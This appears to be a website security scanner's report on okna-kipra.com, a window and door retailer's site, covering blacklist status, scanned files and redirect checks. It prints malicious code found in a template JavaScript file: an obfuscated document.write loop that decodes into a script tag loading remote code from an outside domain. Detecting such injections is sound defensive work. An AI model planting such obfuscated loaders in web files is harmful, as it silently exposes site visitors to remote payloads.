Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=okna-kipra.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://okna-kipra.com/
Result: The website is marked by Yandex as suspicious: visiting this website may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status
http://okna-kipra.com/ | 200 OK; Content-Length: 34999; Content-Type: text/html | clean
http://okna-kipra.com/templates/zt_cara/zt_menus/zt_megamenu/zt.megamenu.js | 200 OK; Content-Length: 3205; Content-Type: application/x-javascript | clean
http://okna-kipra.com/templates/zt_cara/js/zt.script.js | 200 OK; Content-Length: 1467; Content-Type: application/x-javascript | malicious (see below)
http://okna-kipra.com/modules/mod_yoo_carousel/mod_yoo_carousel.js | 200 OK; Content-Length: 2742; Content-Type: application/x-javascript | clean
http://okna-kipra.com/modules/mod_jvslideshow/assets/js/jd.gallery.js | 200 OK; Content-Length: 25619; Content-Type: application/x-javascript | clean
http://okna-kipra.com/modules/mod_jvslideshow/assets/js/jd.gallery.transitions.js | 200 OK; Content-Length: 4323; Content-Type: application/x-javascript | clean
http://counter.rambler.ru/top100.jcn?2542713 | 200 OK; Content-Length: 6853; Content-Type: application/x-javascript | clean
http://okna-kipra.com/about-us.html | 200 OK; Content-Length: 37507; Content-Type: text/html | clean
http://okna-kipra.com/produkcija/okna.html | 200 OK; Content-Length: 40955; Content-Type: text/html | clean
http://okna-kipra.com/produkcija/dveri.html | 200 OK; Content-Length: 37141; Content-Type: text/html | clean
http://okna-kipra.com/produkcija/moskitnie-setki.html | 200 OK; Content-Length: 37825; Content-Type: text/html | clean
http://okna-kipra.com/produkcija/jaluzi.html | 200 OK; Content-Length: 36494; Content-Type: text/html | clean
http://okna-kipra.com/produkcija/dopolnitelno.html | 200 OK; Content-Length: 26411; Content-Type: text/html | clean
http://okna-kipra.com/produkcija/markiza.html | 200 OK; Content-Length: 22873; Content-Type: text/html | clean
http://okna-kipra.com/produkcija/tent-.html | 200 OK; Content-Length: 22854; Content-Type: text/html | clean

Malicious code in http://okna-kipra.com/templates/zt_cara/js/zt.script.js - confirmed by antiviruses (see antivirus reports below). The scanner's excerpt is cut mid-statement inside the template's colour-switcher code; the obfuscated document.write() loop between the <!-- js-tools --> markers rebuilds its output by subtracting 1 from each character code of the quoted string:

    window.addEvent('load', function(){
        var StyleCookie = new Hash.Cookie('ZTCaraStyleCookieSite');
        var settings = { colors: '' };
        var style_1, style_2, style_3;
        new Asset.css(StyleCookie.get('colors'));
        if($('ztcolor1')){$('ztcolor1').addEvent('click', function(e) {
            e = new Event(e).stop();
            if (style_1) style_1.remove();
            new Asset.css(ztpathcolor + 'black.css', {id: 'black'});
            style_1 = $('black');
            settings['colors' [excerpt truncated by the scanner] style_3 = $('violet');
            settings['colors'] = ztpathcolor + 'violet.css';
            StyleCookie.empty();
            StyleCookie.extend(settings);
        });}
    });
    <!-- js-tools -->
    x=0;while(x<71)document.write(String.fromCharCode('=tdsjqu!tsd>#iuuq;00lsfnfodivh.qmbofu/dpn0xpseqsftt0tubu/qiq#?=0tdsjqu?'.charCodeAt(x++)-1))
    <!-- /js-tools -->
    <!-- js-tools -->
    <!-- /js-tools -->

Antivirus reports:
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: okna-kipra.com
Result:
HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0
Connection: close
Date: Sat, 23 Aug 2014 08:40:19 GMT
Pragma: no-cache
Server: nginx/1.2.1
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 23 Aug 2014 08:40:19 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 589305f8d523970cf12916c250c50191=05135be5950981bdc21dde961baa04a7; path=/
Set-Cookie: zt_cara_tpl=zt_cara; expires=Thu, 13-Aug-2015 08:40:19 GMT; path=/
X-Powered-By: PHP/5.2.17
Second query (visit from search engine):
GET / HTTP/1.1
Host: okna-kipra.com
Referer: http://www.google.com/search?q=okna-kipra.com
Result:
The response is similar to that of the first query; no suspicious redirects were found.